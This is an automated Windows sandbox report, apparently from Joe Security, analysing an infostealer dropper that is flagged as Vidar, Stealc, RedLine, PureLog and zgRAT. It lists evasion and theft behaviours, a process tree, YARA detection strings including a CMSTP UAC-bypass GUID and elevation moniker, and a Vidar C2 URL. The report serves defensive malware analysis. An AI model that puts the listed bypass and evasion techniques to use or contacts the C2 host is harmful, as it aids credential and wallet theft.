Edit tour

Windows Analysis Report
wxfSIz4PAi.exe

Overview

General Information

Sample name:	wxfSIz4PAi.exe renamed because original name is a hash value
Original sample name:	0a7871874dc7111b978e798f616211f9.exe
Analysis ID:	1432361
MD5:	0a7871874dc7111b978e798f616211f9
SHA1:	5f020eefc6d5da7efecd31bd3911911169d99021
SHA256:	209765690105250f9d48d09d6bf6c4bbe22668e38b7b7e400b703e27bec45057
Tags:	32exe
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected zgRAT

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wxfSIz4PAi.exe (PID: 7004 cmdline: "C:\Users\user\Desktop\wxfSIz4PAi.exe" MD5: 0A7871874DC7111B978E798F616211F9)

u5ek.0.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Local\Temp\u5ek.0.exe" MD5: ACAAA65D3F174EBF3595E23522837B43)

cmd.exe (PID: 7888 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

EGIJKEHCAK.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)

WerFault.exe (PID: 7952 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 2220 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 2652 cmdline: "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 3488 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7824 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

u5ek.3.exe (PID: 3428 cmdline: "C:\Users\user\AppData\Local\Temp\u5ek.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 7856 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)

WerFault.exe (PID: 7260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1564 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 8116 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 1816 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\xtfky	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\xtfky	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\xtfky	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\jwjqeqx	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\jwjqeqx	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\jwjqeqx	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\u5ek.3.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1650:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000003.1819490382.00000000071F2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xba8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000015.00000002.2506109737.0000000004B12000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000000.1817573323.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000000E.00000000.2111483520.0000027276AEB000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: u5ek.0.exe PID: 3484	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: u5ek.0.exe PID: 3484	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u5ek.0.exe PID: 3484	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: run.exe PID: 2652	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 3488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 3488	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 3488	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: run.exe PID: 8096	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.3.u5ek.0.exe.5b60000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5ek.0.exe.5b60000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
2.2.run.exe.26ccd5b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.run.exe.3e1e15b.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.26ccd5b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
20.2.run.exe.3e1e15b.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
21.2.cmd.exe.4b5c264.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.cmd.exe.580fe64.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.cmd.exe.62500c8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.cmd.exe.51400c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.cmd.exe.51400c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.u5ek.0.exe.40a0e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5ek.0.exe.40a0e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
4.2.cmd.exe.580fe64.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
4.2.cmd.exe.62500c8.8.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
21.2.cmd.exe.4b5c264.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
4.2.cmd.exe.62500c8.8.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
21.2.cmd.exe.51400c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.cmd.exe.51400c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.cmd.exe.51400c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
21.2.cmd.exe.51400c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.run.exe.26cc15b.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.26cc15b.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
1.2.u5ek.0.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5ek.0.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
4.2.cmd.exe.57cb976.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.cmd.exe.57cb976.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.3.u5ek.0.exe.5b60000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5ek.0.exe.5b60000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101749f0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101749f0.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.run.exe.268886d.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.268886d.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
4.2.cmd.exe.62500c8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.cmd.exe.62500c8.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.cmd.exe.62500c8.8.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
